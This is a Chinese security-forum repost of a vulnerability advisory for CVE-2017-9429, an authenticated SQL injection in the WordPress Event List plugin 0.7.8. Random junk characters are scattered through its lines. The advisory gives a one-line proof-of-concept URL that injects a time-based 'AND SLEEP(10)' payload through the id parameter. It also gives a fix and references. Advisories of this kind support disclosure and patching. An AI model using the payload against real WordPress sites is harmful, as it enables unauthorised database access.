最近看过此主题的会员

返回列表 发帖
WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
1. Description:4 M5 n: o; ?) K( Y3 T. v( P
  , P5 n. x/ B5 z& @4 s- w# x
     * D& _& N% m' q7 o( c# n% j) j
  
' X7 Y( q3 A+ G$ I9 }SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress$ v0 h$ r* N2 ]' c/ l" x" w: o
allows an authenticated user to execute arbitrary SQL commands via the id
! p* m; S& i0 u/ O3 yparameter to wp-admin/admin.php. : t$ E$ R' y; o) b
  0 j6 S! Q" d9 `  y) u* m
   % c1 b8 i  ?& T* |1 U) }' d
  
0 b$ b* h( b* Z8 s2 ^0 V2. Proof of Concept:
: N" Y# H- Y$ I$ @  
6 P2 X& X$ @6 k) \- @2 y- p   2 B9 r/ P( \- f
  
% k; B$ N8 s) ?http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
. n3 m7 O2 l3 @' `9 u$ V. L=1 AND SLEEP(10); ^8 y4 y# @* J

" k7 _8 Y8 i& r: C  
/ T$ |0 v: o# N7 U   
, ?0 P0 Q; L  u  
7 V2 t! Y3 A0 R' l' A: R! F3. Solution:% b- K: I# j0 z! H4 R
  $ m1 q2 x$ W# K( W, s1 k) I8 Y
     % |' x; `7 [- N
  & P* M& Q0 I' ^( m9 p  K! M
The plugin has been removed from WordPress. Deactivate the plug-in and wait
" N6 c, k9 N5 Ffor a hotfix.- I& y' S0 l! Q' U6 l4 n
  
2 X: Z" r6 n- w5 H2 m   / T1 f% h" q2 p' ~" {. S4 c$ g
    _4 B8 u- U( x: u& S
4. Reference:; o. N$ U1 `; f% t4 z+ u9 o
  
- ]" M- ~; U. k4 f# f) w   1 X% o% t3 B0 D
  
0 W  o4 H3 s# bhttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
. x7 u# h4 c3 Y) x5 u2 V, Y, d1 action-sqli/% }  c& {& V# s
  
1 ^9 W- {+ o. O8 Whttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
" T0 t( C% u; ]% u) f
# s9 Z( U2 u& ]) r* ?, U
% ^" R! `7 v9 X: U0 Z
2 r- M* n% Q  s; A
: \6 X' R3 H" v  I" t( u  @/ k
0 u9 v4 k) I5 l5 q# P8 b) U$ z
9 m% `/ J; `" S" r8 l
) \" L# @- M! K! u8 s2 D4 X' D
- s! B& e6 y5 ?1 m( H
4 Z. j& Y" k, C0 x: C0 d/ F) f( E" T- q
( R. W2 n* }* Y3 |' z. x
9 M* Y3 N( l4 V; l7 S- `0 |9 A

; d! s3 d& A% ]- t! Q$ M! d# w" Z+ _5 b
) H! q7 e0 L4 H, J- U: K0 e# M$ p! b

. n' l; K- W) c! t, }- ?0 f6 @( X
1 K% e1 X0 I" M( k7 C& a
6 f) J5 M- b4 `9 `- t/ K5 O公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表